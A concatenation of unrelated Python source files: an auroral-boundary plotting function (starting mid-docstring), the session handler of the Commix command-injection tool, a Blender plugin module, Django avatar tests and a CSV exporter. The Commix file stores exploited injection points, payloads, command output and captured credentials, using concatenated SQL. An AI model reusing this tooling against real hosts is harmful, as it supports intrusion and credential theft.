the given time, fits the auroral oval boundaries and overlays them on a map object. The poleward boundary is not accurate all the times due to lesser number of satellite passes identifying it. **Args**: * **baseMapObj** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the map object you want data to be overlayed on. * **axisHandle** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the Axis Handle used. * **startTime** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the starttime you want data for. If endTime is not given overlays data from satellites with in +/- 45 min of the startTime * [**coords**] (list or None): Coordinates of the map object on which you want data to be overlayed on. Default 'geo' * [**hemi**] (list or None): Hemisphere of the map object on which you want data to be overlayed on. Value is 1 for northern hemisphere and -1 for the southern hemisphere.Default 1 * [**equBnd**] (list or None): If this is True the equatorward auroral oval boundary fit from the TED data is overlayed on the map object. Default True * [**polBnd**] (list or None): If this is True the poleward auroral oval boundary fit from the TED data is overlayed on the map object. Default False **Returns**: POES TED data is overlayed on the map object. If no data is found, None is returned. **Example**: :: import datetime as dt poesList = gme.sat.overlayPoesTed(MapObj, sTime=dt.datetime(2011,3,4,4)) written by Bharat Kunduri, 20130216 """ import utils import matplotlib as mp import datetime import numpy import matplotlib.pyplot as plt import gme.sat.poes as Poes import math import matplotlib.cm as cm from scipy import optimize import models #check all the inputs for validity assert(isinstance(startTime,datetime.datetime)), \ 'error, sTime must be a datetime object' # Check the hemisphere and get the appropriate folat folat = [ 45. * hemi, 90. * hemi ] # Get the time range we choose +/- 45 minutes.... pltTimeInterval = numpy.array( datetime.timedelta( minutes = 45 ) ) timeRange = numpy.array( [ startTime - pltTimeInterval, startTime + pltTimeInterval ] ) satNum = [ 15, 16, 17, 18, 19 ] # We set the TED cut-off value to -0.75, # From observed cases this appeared to do well... # though fails sometimes especially during geomagnetically quiet times... # However this is version 1.0 and there always is room for improvement equBndCutoffVal = -0.75 # If any particular satellite number is not chosen by user loop through all the available one's satNum = numpy.array( satNum ) # I like numpy arrays better that's why I'm converting the satNum list to a numpy array latPoesAll = [[] for j in range(len(satNum))] lonPoesAll = [[] for j in range(len(satNum))] tedPoesAll = [[] for j in range(len(satNum))] timePoesAll = [[] for j in range(len(satNum))] lenDataAll = [[] for j in range(len(satNum))] for sN in range( len(satNum) ) : currPoesList = Poes.readPoes( timeRange[0], eTime = timeRange[1], satnum = int(satNum[sN]), folat = folat ) # Check if the data is loaded... if currPoesList == None : print 'No data found' continue # Loop through the list and store the data into arrays lenDataAll.append( len( currPoesList ) ) for l in range( lenDataAll[-1] ) : # Store our data in arrays if the TED data value is > than the cutoff value try: x = math.log10(currPoesList[l].ted) except: continue if x > equBndCutoffVal: if coords == 'mag' or coords == 'mlt': lat,lon,_ = models.aacgm.aacgmConv(currPoesList[l].folat,currPoesList[l].folon, 0., currPoesList[l].time.year, 0) latPoesAll[sN].append(lat) if coords == 'mag': lonPoesAll[sN].append(lon) else: lonPoesAll[sN].append(models.aacgm.mltFromEpoch(utils.timeUtils.datetimeToEpoch(currPoesList[l].time),lon)*360./24.) else: latPoesAll[sN].append(currPoesList[l].folat) lonPoesAll[sN].append(currPoesList[l].folon) # latPoesAll[sN].append( currPoesList[l].folat ) # lonPoesAll[sN].append( currPoesList[l].folon ) tedPoesAll[sN].append( math.log10(currPoesList[l].ted) ) timePoesAll[sN].append( currPoesList[l].time ) latPoesAll = numpy.array( latPoesAll ) lonPoesAll = numpy.array( lonPoesAll ) tedPoesAll = numpy.array( tedPoesAll ) timePoesAll = numpy.array( timePoesAll ) lenDataAll = numpy.array( lenDataAll ) # Now to identify the boundaries... # Also need to check if the boundary is equatorward or poleward.. # When satellite is moving from high-lat to low-lat decrease in flux would mean equatorward boundary # When satellite is moving from low-lat to high-lat increase in flux would mean equatorward boundary # that is what we are trying to check here eqBndLats = [] eqBndLons = [] poBndLats = [] poBndLons = [] for n1 in range( len(satNum) ) : currSatLats = latPoesAll[n1] currSatLons = lonPoesAll[n1] currSatTeds = tedPoesAll[n1] testLatArrLtoh = [] testLonArrLtoh = [] testLatArrHtol = [] testLonArrHtol = [] testLatArrLtohP = [] testLonArrLtohP = [] testLatArrHtolP = [] testLonArrHtolP = [] for n2 in range( len(currSatLats)-1 ) : #Check if the satellite is moving form low-lat to high-lat or otherwise if ( math.fabs( currSatLats[n2] ) < math.fabs( currSatLats[n2+1] ) ) : if ( currSatTeds[n2] < currSatTeds[n2+1] ) : testLatArrLtoh.append( currSatLats[n2] ) testLonArrLtoh.append( currSatLons[n2] ) if ( currSatTeds[n2] > currSatTeds[n2+1] ) : testLatArrLtohP.append( currSatLats[n2] ) testLonArrLtohP.append( currSatLons[n2] ) if ( math.fabs( currSatLats[n2] ) > math.fabs( currSatLats[n2+1] ) ) : if ( currSatTeds[n2] > currSatTeds[n2+1] ) : testLatArrHtol.append( currSatLats[n2] ) testLonArrHtol.append( currSatLons[n2] ) if ( currSatTeds[n2] < currSatTeds[n2+1] ) : testLatArrHtolP.append( currSatLats[n2] ) testLonArrHtolP.append( currSatLons[n2] ) # I do this to find the index of the min lat... if ( testLatArrLtoh != [] ) : testLatArrLtoh = numpy.array( testLatArrLtoh ) testLonArrLtoh = numpy.array( testLonArrLtoh ) VarEqLat1 = testLatArrLtoh[ numpy.where( testLatArrLtoh == min(testLatArrLtoh) ) ] VarEqLon1 = testLonArrLtoh[ numpy.where( testLatArrLtoh == min(testLatArrLtoh) ) ] eqBndLats.append( VarEqLat1[0] ) eqBndLons.append( VarEqLon1[0] ) if ( testLatArrHtol != [] ) : testLatArrHtol = numpy.array( testLatArrHtol ) testLonArrHtol = numpy.array( testLonArrHtol ) VarEqLat2 = testLatArrHtol[ numpy.where( testLatArrHtol == min(testLatArrHtol) ) ] VarEqLon2 = testLonArrHtol[ numpy.where( testLatArrHtol == min(testLatArrHtol) ) ] eqBndLats.append( VarEqLat2[0] ) eqBndLons.append( VarEqLon2[0] ) if ( testLatArrLtohP != [] ) : testLatArrLtohP = numpy.array( testLatArrLtohP ) testLonArrLtohP = numpy.array( testLonArrLtohP ) VarEqLatP1 = testLatArrLtohP[ numpy.where( testLatArrLtohP == min(testLatArrLtohP) ) ] VarEqLonP1 = testLonArrLtohP[ numpy.where( testLatArrLtohP == min(testLatArrLtohP) ) ] if VarEqLatP1[0] > 64. : poBndLats.append( VarEqLatP1[0] ) poBndLons.append( VarEqLonP1[0] ) if ( testLatArrHtolP != [] ) : testLatArrHtolP = numpy.array( testLatArrHtolP ) testLonArrHtolP = numpy.array( testLonArrHtolP ) VarEqLatP2 = testLatArrHtolP[ numpy.where( testLatArrHtolP == min(testLatArrHtolP) ) ] VarEqLonP2 = testLonArrHtolP[ numpy.where( testLatArrHtolP == min(testLatArrHtolP) ) ] if VarEqLatP2[0] > 64 : poBndLats.append( VarEqLatP2[0] ) poBndLons.append( VarEqLonP2[0] ) eqBndLats = numpy.array( eqBndLats ) eqBndLons = numpy.array( eqBndLons ) poBndLats = numpy.array( poBndLats ) poBndLons = numpy.array( poBndLons ) #get the axis Handle used ax = axisHandle # Now we do the fitting part... fitfunc = lambda p, x: p[0] + p[1]*numpy.cos(2*math.pi*(x/360.)+p[2]) # Target function errfunc = lambda p, x, y: fitfunc(p, x) - y # Distance to the target function # Initial guess for the parameters # Equatorward boundary p0Equ = [ 1., 1., 1.] p1Equ, successEqu = optimize.leastsq(errfunc, p0Equ[:], args=(eqBndLons, eqBndLats)) if polBnd == True : p0Pol = [ 1., 1., 1.] p1Pol, successPol = optimize.leastsq(errfunc, p0Pol[:], args=(poBndLons, poBndLats)) allPlotLons = numpy.linspace(0., 360., 25.) allPlotLons[-1] = 0. eqPlotLats = [] if polBnd == True : poPlotLats = [] for xx in allPlotLons : if equBnd == True : eqPlotLats.append( p1Equ[0] + p1Equ[1]*numpy.cos(2*math.pi*(xx/360.)+p1Equ[2] ) ) if polBnd == True : poPlotLats.append( p1Pol[0] + p1Pol[1]*numpy.cos(2*math.pi*(xx/360.)+p1Pol[2] ) ) xEqu, yEqu = baseMapObj(allPlotLons, eqPlotLats) bpltpoes = baseMapObj.plot( xEqu,yEqu, zorder = 7., color = 'b' ) if polBnd == True : xPol, yPol = baseMapObj(allPlotLons, poPlotLats) bpltpoes = baseMapObj.plot( xPol,yPol, zorder = 7., color = 'r' )
hackersql/sq1map
comm1x/src/utils/session_handler.py
#!/usr/bin/env python # encoding: UTF-8 """ This file is part of Commix Project (http://commixproject.com). Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. For more see the file 'readme/COPYING' for copying permission. """ import os import sys import time import base64 import sqlite3 import urllib2 from src.utils import menu from src.utils import settings from src.thirdparty.colorama import Fore, Back, Style, init """ Session handler via SQLite3 db. """ no_such_table = False """ Generate table name for SQLite3 db. """ def table_name(url): host = url.split('//', 1)[1].split('/', 1)[0] table_name = "session_" + host.replace(".","_").replace(":","_").replace("-","_") return table_name """ Flush session. """ def flush(url): info_msg = "Flushing the stored session from the session file... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: conn = sqlite3.connect(settings.SESSION_FILE) tables = list(conn.execute("SELECT name FROM sqlite_master WHERE type is 'table'")) conn.executescript(';'.join(["DROP TABLE IF EXISTS %s" %i for i in tables])) conn.commit() conn.close() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" except sqlite3.OperationalError, err_msg: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Unable to flush the session file." + str(err_msg).title() print settings.print_critical_msg(err_msg) """ Clear injection point records except latest for every technique. """ def clear(url): try: if no_such_table: conn = sqlite3.connect(settings.SESSION_FILE) conn.execute("DELETE FROM " + table_name(url) + "_ip WHERE "\ "id NOT IN (SELECT MAX(id) FROM " + \ table_name(url) + "_ip GROUP BY technique);") conn.commit() conn.close() except sqlite3.OperationalError, err_msg: print settings.print_critical_msg(err_msg) except: settings.LOAD_SESSION = False return False """ Import successful injection points to session file. """ def injection_point_importation(url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable): try: conn = sqlite3.connect(settings.SESSION_FILE) conn.execute("CREATE TABLE IF NOT EXISTS " + table_name(url) + "_ip" + \ "(id INTEGER PRIMARY KEY, url VARCHAR, technique VARCHAR, injection_type VARCHAR, separator VARCHAR," \ "shell VARCHAR, vuln_parameter VARCHAR, prefix VARCHAR, suffix VARCHAR, "\ "TAG VARCHAR, alter_shell VARCHAR, payload VARCHAR, http_header VARCHAR, http_request_method VARCHAR, url_time_response INTEGER, "\ "timesec INTEGER, how_long INTEGER, output_length INTEGER, is_vulnerable VARCHAR);") conn.execute("INSERT INTO " + table_name(url) + "_ip(url, technique, injection_type, separator, "\ "shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_header, http_request_method, "\ "url_time_response, timesec, how_long, output_length, is_vulnerable) "\ "VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", \ (str(url), str(technique), str(injection_type), \ str(separator), str(shell), str(vuln_parameter), str(prefix), str(suffix), \ str(TAG), str(alter_shell), str(payload), str(settings.HTTP_HEADER), str(http_request_method), \ int(url_time_response), int(timesec), int(how_long), \ int(output_length), str(is_vulnerable))) conn.commit() conn.close() if settings.INJECTION_CHECKER == False: settings.INJECTION_CHECKER = True except sqlite3.OperationalError, err_msg: err_msg = str(err_msg)[:1].upper() + str(err_msg)[1:] + "." err_msg += " You are advised to rerun with switch '--flush-session'." print settings.print_critical_msg(err_msg) sys.exit(0) except sqlite3.DatabaseError, err_msg: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "If the problem persists use the '--flush-session' option." print "\n" + settings.print_critical_msg(err_msg) sys.exit(0) """ Export successful applied techniques from session file. """ def applied_techniques(url, http_request_method): try: conn = sqlite3.connect(settings.SESSION_FILE) if settings.TESTABLE_PARAMETER: applied_techniques = conn.execute("SELECT technique FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "vuln_parameter = '" + settings.TESTABLE_PARAMETER + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC ;") else: applied_techniques = conn.execute("SELECT technique FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "vuln_parameter = '" + settings.INJECT_TAG + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC ;") values = [] for session in applied_techniques: if "tempfile" in session[0][:8]: settings.TEMPFILE_BASED_STATE = True session = session[0][4:] elif "dynamic" in session[0][:7]: settings.EVAL_BASED_STATE = True session = session[0][13:] values += session[0][:1] applied_techniques = ''.join(list(set(values))) return applied_techniques except sqlite3.OperationalError, err_msg: #print settings.print_critical_msg(err_msg) settings.LOAD_SESSION = False return False except: settings.LOAD_SESSION = False return False """ Export successful applied techniques from session file. """ def applied_levels(url, http_request_method): try: conn = sqlite3.connect(settings.SESSION_FILE) if settings.TESTABLE_PARAMETER: applied_level = conn.execute("SELECT is_vulnerable FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "vuln_parameter = '" + settings.TESTABLE_PARAMETER + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC;") else: applied_level = conn.execute("SELECT is_vulnerable FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "vuln_parameter = '" + settings.INJECT_TAG + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC;") for session in applied_level: return session[0] except sqlite3.OperationalError, err_msg: #print settings.print_critical_msg(err_msg) settings.LOAD_SESSION = False return False except: settings.LOAD_SESSION = False return False """ Export successful injection points from session file. """ def injection_point_exportation(url, http_request_method): try: if not menu.options.flush_session: conn = sqlite3.connect(settings.SESSION_FILE) result = conn.execute("SELECT * FROM sqlite_master WHERE name = '" + \ table_name(url) + "_ip' AND type = 'table';") if result: if menu.options.tech[:1] == "c": select_injection_type = "R" elif menu.options.tech[:1] == "e": settings.EVAL_BASED_STATE = True select_injection_type = "R" elif menu.options.tech[:1] == "t": select_injection_type = "B" else: select_injection_type = "S" if settings.TEMPFILE_BASED_STATE and select_injection_type == "S": check_injection_technique = "t" elif settings.EVAL_BASED_STATE and select_injection_type == "R": check_injection_technique = "d" else: check_injection_technique = menu.options.tech[:1] if settings.TESTABLE_PARAMETER: cursor = conn.execute("SELECT * FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "injection_type like '" + select_injection_type + "%' AND "\ "technique like '" + check_injection_technique + "%' AND "\ "vuln_parameter = '" + settings.TESTABLE_PARAMETER + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC limit 1;") else: cursor = conn.execute("SELECT * FROM " + table_name(url) + "_ip WHERE "\ "url = '" + url + "' AND "\ "injection_type like '" + select_injection_type + "%' AND "\ "technique like '" + check_injection_technique + "%' AND "\ "http_header = '" + settings.HTTP_HEADER + "' AND "\ "http_request_method = '" + http_request_method + "' "\ "ORDER BY id DESC limit 1;") for session in cursor: url = session[1] technique = session[2] injection_type = session[3] separator = session[4] shell = session[5] vuln_parameter = session[6] prefix = session[7] suffix = session[8] TAG = session[9] alter_shell = session[10] payload = session[11] http_request_method = session[13] url_time_response = session[14] timesec = session[15] how_long = session[16] output_length = session[17] is_vulnerable = session[18] return url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable else: no_such_table = True pass except sqlite3.OperationalError, err_msg: #print settings.print_critical_msg(err_msg) settings.LOAD_SESSION = False return False except: settings.LOAD_SESSION = False return False """ Notification about session. """ def notification(url, technique, injection_type): try: if settings.LOAD_SESSION == True: success_msg = "A previously stored session has been held against that host." print settings.print_success_msg(success_msg) while True: if not menu.options.batch: question_msg = "Do you want to resume to the " question_msg += "(" + injection_type.split(" ")[0] + ") " question_msg += technique.rsplit(' ', 2)[0] question_msg += " injection point? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) settings.LOAD_SESSION = sys.stdin.readline().replace("\n","").lower() else: settings.LOAD_SESSION = "" if len(settings.LOAD_SESSION) == 0: settings.LOAD_SESSION = "y" if settings.LOAD_SESSION in settings.CHOICE_YES: return True elif settings.LOAD_SESSION in settings.CHOICE_NO: settings.LOAD_SESSION = False if technique[:1] != "c": while True: question_msg = "Which technique do you want to re-evaluate? [(C)urrent/(a)ll/(n)one] > " sys.stdout.write(settings.print_question_msg(question_msg)) proceed_option = sys.stdin.readline().replace("\n","").lower() if len(proceed_option) == 0: proceed_option = "c" if proceed_option.lower() in settings.CHOICE_PROCEED : if proceed_option.lower() == "a": settings.RETEST = True break elif proceed_option.lower() == "c" : settings.RETEST = False break elif proceed_option.lower() == "n": raise SystemExit() else: pass else: err_msg = "'" + proceed_option + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if settings.SESSION_APPLIED_TECHNIQUES: menu.options.tech = ''.join(settings.AVAILABLE_TECHNIQUES) return False elif settings.LOAD_SESSION in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + settings.LOAD_SESSION + "' is not a valid answer." print settings.print_error_msg(err_msg) pass except sqlite3.OperationalError, err_msg: print settings.print_critical_msg(err_msg) """ Check for specific stored parameter. """ def check_stored_parameter(url, http_request_method): if injection_point_exportation(url, http_request_method): if injection_point_exportation(url, http_request_method)[16] == str(menu.options.level): # Check for stored alternative shell if injection_point_exportation(url, http_request_method)[9] != "": menu.options.alter_shell = injection_point_exportation(url, http_request_method)[9] return True else: return False else: return False """ Import successful command execution outputs to session file. """ def store_cmd(url, cmd, shell, vuln_parameter): try: conn = sqlite3.connect(settings.SESSION_FILE) conn.execute("CREATE TABLE IF NOT EXISTS " + table_name(url) + "_ir" + \ "(cmd VARCHAR, output VARCHAR, vuln_parameter VARCHAR);") if settings.TESTABLE_PARAMETER: conn.execute("INSERT INTO " + table_name(url) + "_ir(cmd, output, vuln_parameter) "\ "VALUES(?,?,?)", \ (str(base64.b64encode(cmd)), str(base64.b64encode(shell)), str(vuln_parameter))) else: conn.execute("INSERT INTO " + table_name(url) + "_ir(cmd, output, vuln_parameter) "\ "VALUES(?,?,?)", \ (str(base64.b64encode(cmd)), str(base64.b64encode(shell)), str(settings.HTTP_HEADER))) conn.commit() conn.close() except sqlite3.OperationalError, err_msg: print settings.print_critical_msg(err_msg) except TypeError, err_msg: pass """ Export successful command execution outputs from session file. """ def export_stored_cmd(url, cmd, vuln_parameter): try: if not menu.options.flush_session: conn = sqlite3.connect(settings.SESSION_FILE) output = None conn = sqlite3.connect(settings.SESSION_FILE) if settings.TESTABLE_PARAMETER: cursor = conn.execute("SELECT output FROM " + table_name(url) + \ "_ir WHERE cmd='" + base64.b64encode(cmd) + "' AND "\ "vuln_parameter= '" + vuln_parameter + "';").fetchall() else: cursor = conn.execute("SELECT output FROM " + table_name(url) + \ "_ir WHERE cmd='" + base64.b64encode(cmd) + "' AND "\ "vuln_parameter= '" + settings.HTTP_HEADER + "';").fetchall() conn.commit() conn.close() for session in cursor: output = base64.b64decode(session[0]) return output else: no_such_table = True pass except sqlite3.OperationalError, err_msg: pass """ Import valid credentials to session file. """ def import_valid_credentials(url, authentication_type, admin_panel, username, password): try: conn = sqlite3.connect(settings.SESSION_FILE) conn.execute("CREATE TABLE IF NOT EXISTS " + table_name(url) + "_creds" + \ "(id INTEGER PRIMARY KEY, url VARCHAR, authentication_type VARCHAR, admin_panel VARCHAR, "\ "username VARCHAR, password VARCHAR);") conn.execute("INSERT INTO " + table_name(url) + "_creds(url, authentication_type, "\ "admin_panel, username, password) VALUES(?,?,?,?,?)", \ (str(url), str(authentication_type), str(admin_panel), \ str(username), str(password))) conn.commit() conn.close() except sqlite3.OperationalError, err_msg: print settings.print_critical_msg(err_msg) except sqlite3.DatabaseError, err_msg: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "If the problem persists use the '--flush-session' option." print "\n" + settings.print_critical_msg(err_msg) sys.exit(0) """ Export valid credentials from session file. """ def export_valid_credentials(url, authentication_type): try: if not menu.options.flush_session: conn = sqlite3.connect(settings.SESSION_FILE) output = None conn = sqlite3.connect(settings.SESSION_FILE) cursor = conn.execute("SELECT username, password FROM " + table_name(url) + \ "_creds WHERE url='" + url + "' AND "\ "authentication_type= '" + authentication_type + "';").fetchall() cursor = ":".join(cursor[0]) return cursor else: no_such_table = True pass except sqlite3.OperationalError, err_msg: pass # eof
dpogue/korman
korman/properties/modifiers/logic.py
# This file is part of Korman. # # Korman is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Korman is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Korman. If not, see <http://www.gnu.org/licenses/>. import bpy from bpy.props import * from PyHSPlasma import * from .base import PlasmaModifierProperties from ..prop_world import game_versions from ...exporter import ExportError from ... import idprops class PlasmaVersionedNodeTree(idprops.IDPropMixin, bpy.types.PropertyGroup): name = StringProperty(name="Name") version = EnumProperty(name="Version", description="Plasma versions this node tree exports under", items=game_versions, options={"ENUM_FLAG"}, default=set(list(zip(*game_versions))[0])) node_tree = PointerProperty(name="Node Tree", description="Node Tree to export", type=bpy.types.NodeTree) node_name = StringProperty(name="Node Ref", description="Attach a reference to this node") @classmethod def _idprop_mapping(cls): return {"node_tree": "node_tree_name"} def _idprop_sources(self): return {"node_tree_name": bpy.data.node_groups} class PlasmaAdvancedLogic(PlasmaModifierProperties): pl_id = "advanced_logic" bl_category = "Logic" bl_label = "Advanced" bl_description = "Plasma Logic Nodes" bl_icon = "NODETREE" logic_groups = CollectionProperty(type=PlasmaVersionedNodeTree) active_group_index = IntProperty(options={"HIDDEN"}) def export(self, exporter, bo, so): version = exporter.mgr.getVer() for i in self.logic_groups: our_versions = [globals()[j] for j in i.version] if version in our_versions: if i.node_tree is None: raise ExportError("'{}': Advanced Logic is missing a node tree for '{}'".format(bo.name, i.version)) # If node_name is defined, then we're only adding a reference. We will make sure that # the entire node tree is exported once before the post_export step, however. if i.node_name: exporter.want_node_trees[i.node_tree.name] = (bo, so) node = i.node_tree.nodes.get(i.node_name, None) if node is None: raise ExportError("Node '{}' does not exist in '{}'".format(i.node_name, i.node_tree.name)) # We are going to assume get_key will do the adding correctly. Single modifiers # should fetch the appropriate SceneObject before doing anything, so this will # be a no-op in that case. Multi modifiers should accept any SceneObject, however node.get_key(exporter, so) else: exporter.node_trees_exported.add(i.node_tree.name) i.node_tree.export(exporter, bo, so) def harvest_actors(self): actors = set() for i in self.logic_groups: actors.update(i.node_tree.harvest_actors()) return actors class PlasmaSpawnPoint(PlasmaModifierProperties): pl_id = "spawnpoint" bl_category = "Logic" bl_label = "Spawn Point" bl_description = "Point at which avatars link into the Age" def export(self, exporter, bo, so): # Not much to this modifier... It's basically a flag that tells the engine, "hey, this is a # place the avatar can show up." Nice to have a simple one to get started with. spawn = exporter.mgr.add_object(pl=plSpawnModifier, so=so, name=self.key_name) @property def requires_actor(self): return True class PlasmaMaintainersMarker(PlasmaModifierProperties): pl_id = "maintainersmarker" bl_category = "Logic" bl_label = "Maintainer's Marker" bl_description = "Designates an object as the D'ni coordinate origin point of the Age." bl_icon = "OUTLINER_DATA_EMPTY" calibration = EnumProperty(name="Calibration", description="State of repair for the Marker", items=[ ("kBroken", "Broken", "A marker which reports scrambled coordinates to the KI."), ("kRepaired", "Repaired", "A marker which reports blank coordinates to the KI."), ("kCalibrated", "Calibrated", "A marker which reports accurate coordinates to the KI.") ]) def export(self, exporter, bo, so): maintmark = exporter.mgr.add_object(pl=plMaintainersMarkerModifier, so=so, name=self.key_name) maintmark.calibration = getattr(plMaintainersMarkerModifier, self.calibration) @property def requires_actor(self): return True
bhermansyah/DRR-datacenter
avatar/tests.py
import os.path from django.test import TestCase from django.core.urlresolvers import reverse from django.conf import settings from django.contrib.auth import get_user_model from avatar.settings import AVATAR_DEFAULT_URL, AVATAR_MAX_AVATARS_PER_USER from avatar.util import get_primary_avatar from avatar.models import Avatar try: from PIL import Image dir(Image) # Placate PyFlakes except ImportError: import Image def upload_helper(o, filename): f = open(os.path.join(o.testdatapath, filename), "rb") response = o.client.post(reverse('avatar_add'), { 'avatar': f, }, follow=True) f.close() return response class AvatarUploadTests(TestCase): def setUp(self): self.testdatapath = os.path.join(os.path.dirname(__file__), "testdata") self.user = get_user_model().objects.create_user('test', 'lennon@thebeatles.com', 'testpassword') self.user.save() self.client.login(username='test', password='testpassword') Image.init() def testNonImageUpload(self): response = upload_helper(self, "nonimagefile") self.failUnlessEqual(response.status_code, 200) self.failIfEqual(response.context['upload_avatar_form'].errors, {}) def testNormalImageUpload(self): response = upload_helper(self, "test.png") self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 1) self.failUnlessEqual(response.context['upload_avatar_form'].errors, {}) avatar = get_primary_avatar(self.user) self.failIfEqual(avatar, None) def testImageWithoutExtension(self): # use with AVATAR_ALLOWED_FILE_EXTS = ('.jpg', '.png') response = upload_helper(self, "imagefilewithoutext") self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 0) # Redirect only if it worked self.failIfEqual(response.context['upload_avatar_form'].errors, {}) def testImageWithWrongExtension(self): # use with AVATAR_ALLOWED_FILE_EXTS = ('.jpg', '.png') response = upload_helper(self, "imagefilewithwrongext.ogg") self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 0) # Redirect only if it worked self.failIfEqual(response.context['upload_avatar_form'].errors, {}) def testImageTooBig(self): # use with AVATAR_MAX_SIZE = 1024 * 1024 response = upload_helper(self, "testbig.png") self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 0) # Redirect only if it worked self.failIfEqual(response.context['upload_avatar_form'].errors, {}) def testDefaultUrl(self): response = self.client.get(reverse('avatar_render_primary', kwargs={ 'user': self.user.username, 'size': 80, })) loc = response['Location'] base_url = getattr(settings, 'STATIC_URL', None) if not base_url: base_url = settings.MEDIA_URL self.assertTrue(base_url in loc) self.assertTrue(loc.endswith(AVATAR_DEFAULT_URL)) def testNonExistingUser(self): a = get_primary_avatar("nonexistinguser") self.failUnlessEqual(a, None) def testThereCanBeOnlyOnePrimaryAvatar(self): for i in range(1, 10): self.testNormalImageUpload() count = Avatar.objects.filter(user=self.user, primary=True).count() self.failUnlessEqual(count, 1) def testDeleteAvatar(self): self.testNormalImageUpload() avatar = Avatar.objects.filter(user=self.user) self.failUnlessEqual(len(avatar), 1) response = self.client.post(reverse('avatar_delete'), { 'choices': [avatar[0].id], }, follow=True) self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 1) count = Avatar.objects.filter(user=self.user).count() self.failUnlessEqual(count, 0) def testDeletePrimaryAvatarAndNewPrimary(self): self.testThereCanBeOnlyOnePrimaryAvatar() primary = get_primary_avatar(self.user) oid = primary.id response = self.client.post(reverse('avatar_delete'), { 'choices': [oid], }) primaries = Avatar.objects.filter(user=self.user, primary=True) self.failUnlessEqual(len(primaries), 1) self.failIfEqual(oid, primaries[0].id) avatars = Avatar.objects.filter(user=self.user) self.failUnlessEqual(avatars[0].id, primaries[0].id) def testTooManyAvatars(self): for i in range(0, AVATAR_MAX_AVATARS_PER_USER): self.testNormalImageUpload() count_before = Avatar.objects.filter(user=self.user).count() response = upload_helper(self, "test.png") count_after = Avatar.objects.filter(user=self.user).count() self.failUnlessEqual(response.status_code, 200) self.failUnlessEqual(len(response.redirect_chain), 0) # Redirect only if it worked self.failIfEqual(response.context['upload_avatar_form'].errors, {}) self.failUnlessEqual(count_before, count_after) # def testAvatarOrder # def testReplaceAvatarWhenMaxIsOne # def testHashFileName # def testHashUserName # def testChangePrimaryAvatar # def testDeleteThumbnailAndRecreation # def testAutomaticThumbnailCreation
jswetzen/sie-parse
petra_output.py
#!/usr/bin/env python3 """Output a CSV file that can be imported to Petra""" import os import sys import calendar import csv from csv_dict import CSVDict, CSVKeyMissing def split_csv(table_file='Tabell.csv'): """Split account, cost center and project into three tables""" account = [] cost_center = [] project = [] with open(table_file, newline='') as tablefile: tablereader = csv.reader(tablefile, delimiter=';') for row in tablereader: if row[0] != '' and row[1] != '': account.append([row[0], row[1]]) if row[3] != '' and row[4] != '': cost_center.append([row[3], row[4]]) if row[6] != '' and row[7] != '': project.append([row[6], row[7]]) with open('Konto.csv', 'w', newline='') as accountfile: accountwriter = csv.writer(accountfile, delimiter=';') for row in account: accountwriter.writerow(row) with open('Costcenter.csv', 'w', newline='') as ccfile: ccwriter = csv.writer(ccfile, delimiter=';') for row in cost_center: ccwriter.writerow(row) with open('Projekt.csv', 'w', newline='') as projectfile: projectwriter = csv.writer(projectfile, delimiter=';') for row in project: projectwriter.writerow(row) def _parse_trans_objects(trans): """ Handle an object list of a transaction. The object list contains a cost center and project, formatted like so ['1', 'K0000', '6', 'P-00000000']. Cost center (resultatenhet) is preceeded by a '1' and project by a '6', but the order of the two could be reversed. Cost center always begins with 'K' and project with 'P-'. The object list could also be empty. Returns a tuple (cost_center, project), where any of the two could be None in case the information is missing from the object list. """ cost_center = project = None trans_it = iter(trans) for idx in trans_it: obj = next(trans_it) if idx == '1' and obj.startswith('K'): cost_center = obj elif idx == '6' and obj.startswith('P-'): project = obj return (cost_center, project) class PetraOutput: """Form an output file based on an SieData object and translation table""" def __init__(self, sie_data, account_file, cost_center_file, project_file, default_petra_cc='3200'): 